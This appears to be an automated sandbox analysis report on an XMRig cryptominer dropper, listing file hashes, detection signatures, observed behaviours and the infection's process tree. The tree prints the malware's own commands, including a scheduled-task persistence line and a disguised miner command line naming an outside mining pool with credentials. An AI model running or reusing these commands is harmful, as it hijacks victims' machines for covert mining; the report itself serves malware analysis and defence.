Analysis
-
max time kernel
119s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 01:18
Static task
static1
Behavioral task
behavioral1
Sample
67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe
Resource
win7-20240708-en
General
-
Target
67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe
-
Size
2.5MB
-
MD5
8e23251437fa1dee266f37fb780849df
-
SHA1
936748a0298a97950b7ce34de64a79074db21eeb
-
SHA256
67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8
-
SHA512
46a988454007930915a41467eaec792575d2fc4d3c30e1d4f0287a7d904d6f929235206386cd1cfeb756b84875442a7ff172549d2e209be257782298170e082c
-
SSDEEP
49152:J846cK0B7PlZRb1aLeb2eIitRSq10qaJF1CQC0Tn:JQcK0hPtpBZIitgT9F1hC4
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 8 IoCs
Processes:
resource yara_rule behavioral2/memory/1284-38-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1284-40-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1284-45-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1284-46-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1284-44-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1284-43-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1284-42-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1284-48-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exerundll32.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation rundll32.exe -
Executes dropped EXE 3 IoCs
Processes:
1.exerundll32.exesihost64.exepid Process 2916 1.exe 1480 rundll32.exe 4440 sihost64.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
rundll32.exedescription pid Process procid_target PID 1480 set thread context of 1284 1480 rundll32.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe -
Modifies registry class 2 IoCs
Processes:
67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exeOpenWith.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings 67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings OpenWith.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1.exerundll32.exesvchost.exepid Process 2916 1.exe 1480 rundll32.exe 1480 rundll32.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe 1284 svchost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
1.exerundll32.exesvchost.exedescription pid Process Token: SeDebugPrivilege 2916 1.exe Token: SeDebugPrivilege 1480 rundll32.exe Token: SeLockMemoryPrivilege 1284 svchost.exe Token: SeLockMemoryPrivilege 1284 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
OpenWith.exepid Process 532 OpenWith.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe1.execmd.execmd.exerundll32.exedescription pid Process procid_target PID 3708 wrote to memory of 2916 3708 67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe 84 PID 3708 wrote to memory of 2916 3708 67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe 84 PID 2916 wrote to memory of 1384 2916 1.exe 87 PID 2916 wrote to memory of 1384 2916 1.exe 87 PID 1384 wrote to memory of 5008 1384 cmd.exe 89 PID 1384 wrote to memory of 5008 1384 cmd.exe 89 PID 2916 wrote to memory of 2540 2916 1.exe 102 PID 2916 wrote to memory of 2540 2916 1.exe 102 PID 2540 wrote to memory of 1480 2540 cmd.exe 104 PID 2540 wrote to memory of 1480 2540 cmd.exe 104 PID 1480 wrote to memory of 4440 1480 rundll32.exe 105 PID 1480 wrote to memory of 4440 1480 rundll32.exe 105 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 PID 1480 wrote to memory of 1284 1480 rundll32.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe"C:\Users\Admin\AppData\Local\Temp\67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "rundll32" /tr "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rundll32" /tr "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5008
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\rundll32.exeC:\Users\Admin\AppData\Local\Temp\rundll32.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
- Executes dropped EXE
PID:4440
-
-
C:\Windows\System32\svchost.exeC:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6146704 --pass=myminer --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=10 --cinit-idle-cpu=80 --cinit-stealth5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:532
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD5e2f6770cd6b8a5b511f11040a226ef6f
SHA15815d379aa8e3fa61173451ae7050ce082839c5f
SHA25655bf65b6eb3e5132b4716619de626731e38b27dfcf53b69f47beb1634e9403b0
SHA512db24d848af3f4de9d47962671e0471a494fa343d35ec2ac4a357616b259c3b07b7e1a2422c1d239fad9bde80726d04fa0986a99cc01a814daacd083552d03b5e
-
Filesize
7KB
MD5ede8f46793b04053a664edb7e254e01f
SHA13148e8d408a956195e37c0084ffa99b3986aa08c
SHA2567b0117c87556fa7fd347f9a5cac49c4502279961bd19307953f3c15c57f2e121
SHA512719aacee2752688f4f9cfd423fdb0508e8b810c7fd28ecf6a4e14b96e828b8e86e1b3fa2754e6a05ccc2adb52dcad7dcca45792815ad07946fcc1dc19290b109